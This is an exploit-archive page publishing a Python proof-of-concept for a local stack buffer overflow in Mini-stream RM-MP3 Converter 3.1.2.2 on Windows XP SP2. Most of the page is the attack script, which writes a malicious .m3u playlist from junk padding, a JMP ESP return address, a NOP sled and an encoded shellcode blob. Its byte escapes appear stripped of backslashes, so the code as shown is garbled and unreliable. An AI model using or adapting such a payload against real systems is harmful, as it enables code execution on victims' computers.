Mini-stream RM-MP3 Converter v3.1.2.2 Local Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mini-stream RM-MP3 Converter v3.1.2.2 Local Buffer Overflow
# Published : 2012-04-09
# Author :
# Previous Title : AnvSoft Any Video Converter 4.3.6 Stack Overflow Exploit
# Next Title : CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow Exploit

# Exploit Title : Mini-stream RM-MP3 Converter? V 3.1.2.2 Local Buffer
OverFlow
# Author : [SkY-NeT SySteMs]
# Software Link : [http://mini-stream.net/rm-to-mp3-converter/download/]
# Version : [3.1.2.2]
# Tested on : [Xp Sp 2]
# Category : Local
# Code : Python
# Email : [skynet-systems@hotmail.il.co]
# WebSite : [http://sskynetsystems.blogspot.com/]


# !/usr/bin/python

import os,sys

header= "http://."
junk= "x41" * 17416 # [A]
ESP = "x13x44x87x7C" # 7C874413 FFE4 JMP ESP
NOPS = "x90" * 16

ShellCode =(
"x2bxc9x83xe9xcexe8xffxffxffxffxc0x5ex81x76" 
"x0exa8x6ex77xcex83xeexfcxe2xf4x54x86xfexce" 
"xa8x6ex17x47x4dx5fxa5xaax23x3cx47x45xfax62" 
"xfcx9cxbcxe5x05xe6xa7xd9x3dxe8x99x91x46x0e" 
"x04x52x16xb2xaax42x57x0fx67x63x76x09x4ax9e" 
"x25x99x23x3cx67x45xeax52x76x1ex23x2ex0fx4b" 
"x68x1ax3dxcfx78x3exfcx86xb0xe5x2fxeexa9xbd"
"x94xf2xe1xe5x43x45xa9xb8x46x31x99xaexdbx0f"
"x67x63x76x09x90x8ex02x3axabx13x8fxf5xd5x4a"
"x02x2cxf0xe5x2fxeaxa9xbdx11x45xa4x25xfcx96" 
"xb4x6fxa4x45xacxe5x76x1ex21x2ax53xeaxf3x35"
"x16x97xf2x3fx88x2exf0x31x2dx45xbax85xf1x93" 
"xc2x6fxfax4bx11x6ex77xcexf8x06x46x45xc7xe9" 
"x88x1bx13x9exc2x6cxfex06xd1x5bx15xf3x88x1b" 
"x94x68x0bxc4x28x95x97xbbxadxd5x30xddxdax01" 
"x1dxcexfbx91xa2xadxc9x02x14xe0xcdx16x12xce")
file = open("test.m3u","w")
file.write(header+junk+ESP+NOPS+ShellCode)
file.close()